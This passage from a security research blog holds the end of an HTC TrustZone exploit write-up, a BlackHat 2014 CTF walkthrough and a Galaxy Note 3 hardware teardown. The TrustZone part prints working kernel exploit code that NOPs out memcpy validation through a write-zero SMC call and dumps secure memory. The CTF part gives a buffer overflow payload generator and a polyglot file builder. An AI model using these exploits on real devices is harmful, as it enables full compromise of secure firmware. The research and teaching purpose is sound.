    if (len != 0x1140) {
      return -17;
    }
  }
  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;
}

In this pseudocode, we can see some address validation (heh, no comment), checking a flag to perform further validation, etc. At the very end, we have:

  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;

So if we can get there, we have a fully controlled memcpy(). But how can we do that?

00 00                        MOV r0, r0         ; nop in thumb mode
00 00 00 00                  ANDEQ r0, r0, r0   ; nop in arm

A null write is a NOP equivalent in both ARM and thumb mode, if you overwrite code. And surely that isn't RWX, is it? Well, apparently so.

ROM:2A003278                 PUSH            {R3-R7,LR}
ROM:2A00327A                 MOV             R4, R0
ROM:2A00327C                 MOV             R3, R1
ROM:2A00327E                 MOV             R5, R2

// validation, nop'd out

ROM:2A0033EC                 MOV             R1, R3
ROM:2A0033EE                 MOV             R0, R4
ROM:2A0033F0                 BLX             memcpy
ROM:2A0033F4                 MOV             R1, R5
ROM:2A0033F6                 MOV             R0, R4
ROM:2A0033F8                 BLX             invalidate_data_cache
ROM:2A0033FC                 MOVS            R0, #0
ROM:2A0033FE                 POP             {R3-R7,PC}
ROM:2A0033FE ; End of function tzbsp_oem_memcpy

Using the write zero primitive on the address range from 0x2A003280 to 0x2A0033E8 nops out all validation, allowing you to memcpy in and out of secure memory as desired.

This memcpy can be used to export all data out of secure memory, copy in your own shellcode, overwrite QC's knowledge of where secure and insecure code resides, and anything else you need. Boom!

The exploit code is shown below, utilizing this memcpy to overwrite the g_disable_bits bitmask with 0xFFFFFFFF to turn on all services. For simplicity, the call_svc function is not included, but it is merely a wrapper around a smc call that sets up the scm_command structure. It takes in the SCM function identifier, the argument count, and then that number of arguments.

  #define TZ_MEMCPY_NOP_START (0x2A003280)
  #define TZ_MEMCPY_NOP_STOP  (0x2A0033E8)
  #define TZ_HTC_DISABLE_BITS (0x2A02BAC4)

  #define TZ_HTC_OEM_MEMCPY_ID (0x3f814)
  #define WRITE_ZERO(x) call_svc(0x3f81b, 3, 0x0, x - 0x10, 0x14);

  int i;
  // allocate our version of the g_disable_bits and set to 0xffffffff (all enabled)
  int * val = kzalloc(4, GFP_KERNEL);
  val[0] = 0xffffffff;

  // NOP out all validation in tzbsp_oem_memcpy
  for (i = TZ_MEMCPY_NOP_START ; i <= TZ_MEMCPY_NOP_STOP ; i+=4) {
    if ((i % 4) != 0) {
      printk("[-] [0x%x] INVALID NOP...MUST BE 4 BYTE ALIGNED!\n", i);
      break;
    }
    WRITE_ZERO(i);
  }
  flush_cache_all();

  // use memcpy to enable all the other functions (unnecessary but fun)
  call_svc(TZ_HTC_OEM_MEMCPY_ID, 3, TZ_HTC_DISABLE_BITS, virt_to_phys(val), 4);
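
Once the validation is gone, the same service will just as happily copy secure memory back out to the non-secure world. A sketch (chunking and error handling omitted):

  // dump the first page of TZ memory into a kernel buffer, now that the
  // validation in tzbsp_oem_memcpy has been NOP'd out
  void * dump = kzalloc(0x1000, GFP_KERNEL);
  call_svc(TZ_HTC_OEM_MEMCPY_ID, 3, virt_to_phys(dump), 0x2A000000, 0x1000);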

 

[So What?]

We've shown a pathway for gaining arbitrary code execution within TrustZone, but, in fairness to Qualcomm, this specific exploit is limited to HTC devices and caused by code HTC added. However, it's a great exemplar of how just one, terrible, and obvious write zero vulnerability can lead to the complete compromise of TrustZone. And due to TrustZone's architecture, passing physical buffers back and forth, this class of write vulnerability is the most common and simplest vulnerability you're going to find. So to summarize, write vulns pop up like mushrooms from this fertile ground, and write vulns can really ruin your day.

To put it another way, why does a mistake in discretix (dealing with DRM functionality) have the ability to nuke secure boot? This seems like a dangerous idea, and is what we meant when we started this all off with the claim that the inclusion of bad, complex code provides a net reduction in real world security for the user. And we're ragging on DRM code here because that's where the vulnerability we discussed was found, but TZ's architecture leaves no room for imperfect code anywhere. And imperfect code abounds.

Given the financial drivers, we don't expect a lot of this to change, but we're hopeful we'll one day see a trend towards protecting the user from malware over protecting media companies from users.

In conclusion, we have given a peek behind the trusted veil to show you a piece of how everything works, as well as a few pointers along the way to get you started on your own research.

Hope you enjoyed our travels. Talk to you again soon. 

Go forth and 0day,
n & c

Thursday, July 24

Atredis BlackHat 2014 Contest After Action Report



<Trigger warning: spoilers ahoy! If you’re still playing and don’t want to read it, STOP NOW!>

We had an extra BlackHat pass lying around this year, so we decided to play a little game to give it away. We figured we'd shoot for a pretty easy challenge, given that we're so close to the actual conference, so we intentionally did a few things to make it easier on you. This is my explanation of how I'd have gone about the challenge, with a few notes along the way about what's going on under the hood.

Next year, we’ll make it a lot harder, and release it in ~April so people can convince their bosses to buy them cheap airfare to Vegas.

The first three correct answers came in at 1h28m, 1h51m, and 2h00m. Congrats to Cloudchaser, steponequit, and anon!

So, on to the binaries.

When you first download the file at the link, you receive a simple PDF, Contest.pdf.



But wait, there’s more!



The thing with the PDF file format is that it's extremely forgiving. Its contents run from a header in the first few bytes to a %%EOF marker, and readers will happily allow garbage to be appended after that.

Conversely, ZIP keeps its “header” at the end of the file, and the standard unzip utility will ignore garbage in front of the real one, so you can simply combine the two files together and readers for both PDF and ZIP file formats will be (mostly) happy.

[Aside: you can stuff the ZIP file in a real PDF object trailing after the EOF marker and gain full PDF compliance, like the PoC||GTFO PDFs which are simultaneously ZIPs, PDFs, Truecrypt binaries, Angelic loot fairies, and will even make you a sandwich. Likewise, I'm pretty sure you can tailor the ZIP header/footer to tell it at what offset the actual ZIP file starts, but #lazy. We didn't mess with modifying the PDF or ZIP files because they worked fine, other than the warning message shown above in unzip.]
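
Building one of these yourself takes nothing fancier than concatenation. A quick sketch (the file names here are made up):

#include <stdio.h>

/* Append a ZIP to the end of a PDF.  PDF readers stop caring after %%EOF,
 * while unzip scans from the end of the file for the central directory and
 * only grumbles about the leading "garbage". */
static int append_file(FILE *out, const char *path)
{
    FILE *in = fopen(path, "rb");
    char buf[4096];
    size_t n;

    if (!in)
        return -1;
    while ((n = fread(buf, 1, sizeof(buf), in)) > 0)
        fwrite(buf, 1, n, out);
    fclose(in);
    return 0;
}

int main(void)
{
    FILE *out = fopen("polyglot.pdf", "wb");   /* hypothetical output name */

    if (!out)
        return 1;
    if (append_file(out, "cover.pdf") || append_file(out, "stage1.zip"))
        return 1;
    fclose(out);
    return 0;
}

The result opens fine as a PDF and unzips with the same warning shown above.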

On another note, some folks ran binwalk on the PDF and found the .zip appended to it that way. Not a bad idea.

Yeah yeah, a very simple stage 0, so simple I hesitate to call it anything other than our marketing guy’s attempt to make you look at our logo. (But what a pretty logo it is!) Before I digress too much further, let’s move on.

[stage 1]
Ok, so now we have this new file, bouncilicious. What is it?


Since we’re pretty sure we’re working with a Linux binary, let’s go ahead and switch over to Linux and run it to see what’s up.



So it echoes your favorite song in the world, takes some input, and ends. Is this a super easy challenge that has a ridiculous buffer overflow in it?



Why yes, yes it is! Let’s load it into GDB and take a look.



OK, so we immediately have control of EIP (and EBP). When we ran file, above, it told us the binary still had symbols in it, so what are those?



So either this binary only has three functions in it or the symbols for all the rest were stripped out. The three functions with symbols are blackhat, goto_blackhat, and main.

Huh, I want to goto_blackhat. Do you want to goto blackhat? What happens if we just try to go to it, via gdb? (Or look up its address and stuff it in our input string.)



OK, that naïve idea didn’t work. Let’s back up and take a look at those functions whose symbols weren’t stripped.

[main]



Wow, the assembly in these things is so clean. It’s almost like someone disabled all gcc optimization to make it easily readable. That someone must be a nice guy, or a guy I hate, because he made this too easy.

Here, we have main loading some variables on the stack and making a call to mmap. IDA helpfully told us its args, so we know it’s mmap’ing a 0x1000 byte region near 0x24242424 (we’re having mmap automatically page align for us) with some flags.

Assuming mmap doesn’t fail, it goes here:

This copies 0x13 bytes from goto_blackhat to the value stored in EAX, which was 0x24242424 ("$$$$"). OK, so we know that goto_blackhat is copied to 0x24242424. Let's save that knowledge for later.

Looking at sub_0804A9FA we can see _gets is called with absolutely no checking, and an overflow occurs.
.text:0804A9FA                 push    ebp
.text:0804A9FB                 mov     ebp, esp
.text:0804A9FD                 sub     esp, 28h
.text:0804AA00                 mov     dword ptr [esp], offset a31myoILlTellYo ; "\x1B[31mYo, I'll tell you what I want, "...
.text:0804AA07                 call    _printf
.text:0804AA0C                 lea     eax, [ebp+s]
.text:0804AA0F                 mov     [esp], eax      ; s
.text:0804AA12                 call    _gets
.text:0804AA17                 leave
.text:0804AA18                 retn
[Note: I think one solver didn’t notice the BOF and just patched the binary to bounce everywhere needed in the binary to solve this challenge. Word.]

So let’s take a look at the function that was copied to 0x24242424.

[goto_blackhat]



Here, we can see it simply loads the address for blackhat and jumps to it. Moving onwards…

[blackhat]

And so now we land at blackhat, which has this check in the first chunk of code:
<snipped: prologue, set up the stack>
<snipped: call a couple of functions>
<snipped: load some strings into variables>

.text:0804A8F1                 mov     eax, ebp
.text:0804A8F3                 add     eax, 4
.text:0804A8F6                 mov     eax, [eax]
.text:0804A8F8                 cmp     eax, 24242424h
.text:0804A8FD                 jz      short loc_804A917
.text:0804A8FF                 mov     dword ptr [esp], offset s ; "Oops, that's not the money shot! You ne"...
.text:0804A906                 call    _puts
.text:0804A90B                 mov     dword ptr [esp], 1 ; status
.text:0804A912                 call    _exit
This is the part of the code that implements the error message shown above. Here, don’t scroll back up, I’ll paste it again:



To understand what’s being compared against 0x24242424 at 0x0804A8F8, you have to backtrack from the value stored at [EAX] at 0x0804A8F6, which is the value stored at [EBP+4]. Right after the overflow, leave/retn pops 0x24242424 into both EBP and EIP, gaining execution flow. In goto_blackhat's prologue, EBP is pushed to the stack, fixed with a valid EBP (ESP was not under user control via this path) and then the code jmp's to blackhat.

In blackhat, then, the address from the time of the overflow that's now on the stack is dereferenced and compared against 0x24242424. As such, if you didn't stuff this value on the stack yourself, or modify EBP prior to hitting goto_blackhat, Do Not Pass Go and the application quits.

Regardless, from talking to folks who completed the challenge, many (most?) people didn’t know what was actually being compared here, and just made an educated (or uneducated) guess to bypass this check or nop’d the check or patched the jump or swapped the eflag, which is basically what was intended at the outset anyway. (Note to self: if you’re trying to be sneaky, don’t implement your sneakiness in a fashion that gives people the info they need to just guess and bypass the whole damn check without understanding what it’s doing.)

Moving on, if your EBP was correct at the time goto_blackhat was called, it outputs those strings that were loaded at the beginning of the function:



… and then falls into these two loops down here:



For now, you can ignore what this does, other than that it calls _write with some data. (And if you’re really perceptive, you’ll notice it wrote to FD 2, which is STDERR.)
.text:0804A9A4                 mov     [esp+4], eax       ; buf
.text:0804A9A8                 mov     dword ptr [esp], 2 ; fd
.text:0804A9AF                 call    _write
[Note: we considered several ways to hide the goto_blackhat mmap/memcpy, stripping everything, inlining everything, forcing you to ROP or change memory permissions yourself, dynamically generating the two echoed values, seeding the decryption routine with EBP, etc. Marketing put the kibosh on that, as there was concern no one would spend the time to solve it before BH actually arrived. Plus, only malware reversers (and warez scenesters) would figure it out, and there are too many of you at BH already. ☺ We hope you enjoyed this easier version.] [Just kidding, we love you all.]

[Another Note: This big loop does some relatively simple decryption of the embedded buffer from a relatively nasty key computed with two modified SHA1 hashes with a non-standard TEA and other ridiculousness. We had one solver who RE’d these functions and manually decrypted the buffer. Basically, the key generation part was fixed in code with no seeds from process state, so grabbing that key and then manually decrypting was not hard once you saw what it was doing.]

Ok, so we need our EBP to be 0x24242424, and we saw in main, earlier, that the bounce function goto_blackhat was copied to 0x24242424, so our input string is really easy. Dolla dolla billz, yo:



When you press enter, it dumps a bunch of binary data to STDERR, stage 2.
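
If you'd rather script the payload than count dollar signs by hand, something like the sketch below works. The padding length depends on the exact frame layout of the gets() caller, so treat PAD as a placeholder you'd confirm in GDB:

#include <stdio.h>
#include <string.h>

/* Hypothetical stage 1 payload generator: pad out to the saved EBP, then
 * overwrite both saved EBP and the return address with 0x24242424 ("$$$$").
 * PAD is a placeholder; the real offset comes from the frame layout above. */
#define PAD 0x28

int main(void)
{
    char payload[PAD + 8 + 1];

    memset(payload, 'A', PAD);
    memcpy(payload + PAD, "$$$$", 4);       /* saved EBP  -> 0x24242424 */
    memcpy(payload + PAD + 4, "$$$$", 4);   /* return EIP -> 0x24242424 */
    payload[PAD + 8] = '\0';

    puts(payload);
    return 0;
}

Piping that into the challenge binary and redirecting STDERR (something like ./payload | ./bouncilicious 2> stage2.bin) captures the dumped blob.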



[stage 2]

Great, another PDF.



This brilliant haiku is a hat tip to our wonderful neighbors over at PoC||GTFO, specifically their 3rd edition that was released a couple of months ago. When you track it down, you’ll find a fantastic article on Angecryption, which is a way to create a binary that, when encrypted with a specific key and IV, generates a new file.

[Several people got stuck here. They briefly skimmed the angecryption article and just tried to decrypt the PDF (or the garbage at the end of the PDF) with the key/IV values given at the end of [stage 1]. Angecryption is madness because you don’t decrypt to get the plaintext, but encrypt it. I heartily recommend you go read that (and all other) PoC||GTFO articles over at any of the mirrors, such as http://openwall.info/wiki/people/solar/pocorgtfo.]

Googling for Angecryption, you’ll find the googlecode site hosting it (which contains an example encryption python script), or you could have just read the paper and done the encryption by hand:
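
For reference, the "by hand" route is nothing more exotic than an AES-CBC encryption of the stage 2 file with the key and IV handed out at the end of stage 1. Here's a sketch using OpenSSL; the key/IV and file names are placeholders, and AES-128 with a block-aligned input and no padding are assumptions on my part:

#include <openssl/evp.h>
#include <stdio.h>

/* Sketch: AES-CBC-encrypt (not decrypt!) the stage 2 PDF with the stage 1
 * key/IV to produce the next file. */
int main(void)
{
    unsigned char key[16] = { 0 };   /* replace with the key from stage 1 */
    unsigned char iv[16]  = { 0 };   /* replace with the IV from stage 1  */
    unsigned char ibuf[4096], obuf[4096 + 16];
    int n, outlen;

    FILE *in  = fopen("stage2.pdf", "rb");
    FILE *out = fopen("stage3.pdf", "wb");
    if (!in || !out)
        return 1;

    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
    EVP_CIPHER_CTX_set_padding(ctx, 0);   /* assumes a block-aligned input */

    while ((n = (int)fread(ibuf, 1, sizeof(ibuf), in)) > 0) {
        EVP_EncryptUpdate(ctx, obuf, &outlen, ibuf, n);
        fwrite(obuf, 1, outlen, out);
    }
    EVP_EncryptFinal_ex(ctx, obuf, &outlen);
    fwrite(obuf, 1, outlen, out);

    EVP_CIPHER_CTX_free(ctx);
    fclose(in);
    fclose(out);
    return 0;
}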



This dumps yet another PDF:



…and this time it’s simply a wrapper for a zip file containing an mp3. (As currently written, Angecryption only supports a few filetypes, and we didn’t mess with implementing a zip or mp3 file; we simply reused the same PDF+ZIP file trick we used at the beginning.)



This mp3 instructed you to email us at a supersecret address, but I won’t tell you, just in case anyone else still wants to play along.

N

Monday, April 28

Making a 1st Impression with Hardware

Fluffy Introduction Text

I get the "What exactly do you do for a living?" question fairly often, and tend to generically toss out a canned response of "hacker" or "information security professional" or "computers" depending on the person asking and whether or not I'm being questioned by a customs official with a gun and a surly look. I thought it might be fun to blog up an example or two of what we actually do for a paycheck, as it might help explain our niche inside a niche industry and maybe illuminate where our customers' money goes and what value we provide.

For this exploration, let us focus on two random devices sitting on my desk this weekend: the Samsung Galaxy Note 3 (specifically the SM-9005 variant) and the often misunderstood and slightly obscure Samsung Anyway S102.

For the Note 3, I’ll detail what a teardown looks like to me and why it matters to the customer. The device is fairly well documented on the internet, so a full and complete hardware reverse engineering analysis probably isn't worth the time. As such, I’ll just focus on the high level overview. Consider this my first couple of hours on a project, simply what I look for and what my plan of attack would be. This teardown will disregard software and the USB stack entirely, and just be a glance at the hardware.

After the SM-9005, I’ll walk through a deeper analysis of the S102. I expect this to be quite interesting and fun, though it will be a separate post that will go up within the next couple of weeks.

So, without further ado….

The Samsung Galaxy Note 3 (SM-9005) Teardown


With any common mobile platform that crosses my desk for analysis, I start with a quick perusal of iFixIt for a teardown. For the Note III, we find this: <iFixIt Link>

The device is fairly straightforward to crack open, but the public teardown doesn't tell us much about the internals. We can fix this with a bit more time on Google and quickly run into the beloved chipworks.com teardown (we will come back to this later): <ChipWorks Link>

While the overall information is nice, what we really care about here is:
  • What components are being used? (ChipWorks gave us a listing already)
  • How was the device built?
  • Did the designers leave any debugging mechanisms exposed or active during production?
  • Are there any weak or squishy portions of the design that look easily exploitable?
So with the background we have at hand, it’s time to take a screwdriver to the phone and see what’s inside for ourselves.

A GENERIC TEARDOWN PHOTO
Taking a closer look at the main PCB, we see all the same components and latch plugs that the other teardowns exposed. We also get a first-pass understanding of the device complexity and its general craftsmanship, and in this case the Samsung engineers’ design stays true to form with a clean and well-structured PCB. All the components are well placed and the overall view is aesthetically uncluttered. We can quickly see the camera in the center, as well as the SIM card slot and the battery connector. The large chip below and to the right of the camera is the main slab of NAND flash on the device. The other components we will revisit after we finish our “lay of the land” exploration.

TOP OF THE PCB
Further analysis of the phone shows the case connections are just as cleanly laid out. Typically there is little of interest on the case and screen sides of a phone, but on the Note 3 we can see a handful of interaction points that drive the screen and touch sensors underneath the PCB. The small piece of silicon on the right (below the headphone jack) is the Synaptics S5050A touch screen controller. If the goal of this project were to manipulate user interaction points, this would be our starting place. Aside from the controller and the pads on the left, there is little on the screen side but dense connection cables, and these tend to be easier to explore on the main PCB.

SCREEN SIDE OF THE CASE, UNDER PCB
Our last view of the entire PCB will be from the bottom. This is where our main SoC (system on a chip) is hiding, along with a collection of other interesting components.

Starting with the top left corner, we can see where the PCB contacts the pressure connection pads on the case that I mentioned before. If this were a real project I would eventually explore them with a multimeter to be sure, but my initial assumption is that these simply share power and ground with the screen.

Moving to the top, we can see the 4 pins that connect to the battery when the phone is assembled, and to the right of that is our main slab of RAM, followed by 2 sets of RF-shielded components.

BOTTOM OF THE MAIN PCB
If you didn’t notice, I did a bit of “it’s magic” handwaving when locating the SoC (it’s hiding underneath the slab of RAM). We know this because ChipWorks already discovered it for us when we googled the device, and they tell us it is the new Snapdragon 800 (MSM8974). Had this not been the case, I would have to start desoldering components looking for Qualcomm silicon. While cleaning a PCB of all its components gives me great joy, this phone was a present and I’d like to at least boot it once before we kill it, so we will take the ChipWorks finding as gospel for the time being.

So far, our analysis is far from special or unique. iFixIt delves to this level trying to help people fix or replace broken components on a phone, and ChipWorks delves a bit deeper looking for new hardware and trends in the engineering space. This is also where we diverge: our path is to catalogue hardware interaction points and to explore the PCB for potential debug interfaces.

Jumping down the stack a bit


Now, before we delve much deeper, it’s probably a good idea to spin up a quick vernacular, especially if you are not experienced in hardware. First, modern PCBs are typically dense and multi-layered. As such, a simple visual inspection is not always going to grant you 100% understanding, as we can’t see the internal sandwiched layers from the top or bottom. Phones and high-end consumer electronics are especially dense, while more esoteric hardware still tends to be dual layer (top and bottom only).

When a trace needs to connect between layers, a via is used. These are simply the “dots” you see during visual inspection, and they generally mean that a trace has jumped to another layer (though they can be used for other things as well, like pulling a reference voltage or ground signal from a different layer).

Lastly, when PCBs are being mass produced they need to be tested prior to deployment. While a multitude of options are available, the majority of devices we look at in the real world still support the concept of a “bed of nails”. <insert google image search results here>. This basically means that interesting or problematic areas of the board have test points exposed on the outer layers of the PCB so that an external testing machine can quickly validate them on the production line. Furthermore, my favorite hardware designers tend to expose debug functionality through these interaction points to allow for firmware and OS flashing post-production.

Now that we are loaded with a simplified lexicon, we can delve a bit deeper into some closeup photos of the SM-9005 board.

The first thing I notice upon glancing at the PCB is the bed of nails pads lying about the board (these are the copper/gold circles in the picture below). If this weren’t a Samsung device, and I had not spent countless days tracing prior hardware revisions of these pads, I would be really excited. I’d immediately start tracing the pads with a multimeter and tapping them with a logic analyzer to explore what they are exposing. Given the target though, we will wait on that task until the S102 analysis (where I expect much more interesting results).

BED OF NAILS PADS AND CABLE SEAT
The other thing to take note of in this picture is the wonderfully large spacing of the leads off the ribbon cable seat. These pinouts, while still fairly tight and small, are spaced far enough apart that latching on with a logic analyzer to watch all the data pass over the cable is an approachable task, and much easier than tapping the cables directly. If we cared about PCB-to-screen interactions, this would be our starting point.

While we will disregard the bed of nails pads because I’ve explored Samsung phones in the past and know better, I do see something on the board that makes me second-guess that decision. Below, you will see a collection of unpopulated pads that are designed to seat standard capacitors and resistors. Seeing these gets me quite excited, especially because some of the traces end in nail pads as well.

You will rarely see PCB layouts with truly unused components; everything about physical hardware is a tradeoff between space, cost, usability and mass production. Engineers don’t simply design and produce extra unused pads as a rule, so if they are on production equipment they probably have a function.

UNPOPULATED PADS
In reality, these are probably laid out to support the different hardware variants that Samsung ships around the world. In this manner, the designers can lay out a single PCB and mass produce it instead of doing a full redesign for each variant of the hardware. The factory then populates the board with different component sets depending on whether the phone is destined to be an AT&T LTE device or something else.

Aside from that logical explanation, these pads could expose something immensely more interesting: hardware debugging and firmware manipulation. At some point in production, the device must be loaded with software, and most common SoC vendors protect that functionality with a series of hardware flags controlled by resident voltages. In this case, I would start tracing the pads with a multimeter to see what the missing discrete components would affect, and what circuit they could complete if bridged.

We have seen hardware at a lower mass production scale where through-hole resistors were used to open the SoC for firmware debugging and then simply clipped by hand before final device closure and shipment to customers. If my target were to acquire Qualcomm firmware or debug the resident NAND, these pads would be my starting point. Further enticing me along this path are the mysterious pads exposed directly next to the SoC/RAM stack (as seen below).

PADS ALONG THE MAIN SOC / RAM

Final Thoughts

While we’ve meandered around a bit without real focus, I do hope I’ve explained a bit about what I look for in a teardown and what excites me to see. If this were a real engagement to find security-related issues on the Note 3, I would be tracing all the pins and attempting to recreate the full PCB schematic. I would then acquire spec sheets for every piece of silicon I could and start looking for debug or flashing capabilities. The main focus of this part of a hardware analysis is to plan an attack to grab the resident firmware, and the Note 3 exposes a couple of paths that, while probably dead ends, are nonetheless worth running down.

We would also explore the USB side of this hardware and obviously look at the driver/OS/kernel as well, but I think I’ll save those walkthroughs for an easier device and another blog post.

Thanks for reading,

m0nk

If you have any questions, please email us or find us on Twitter @m0nk_dot / @Atredis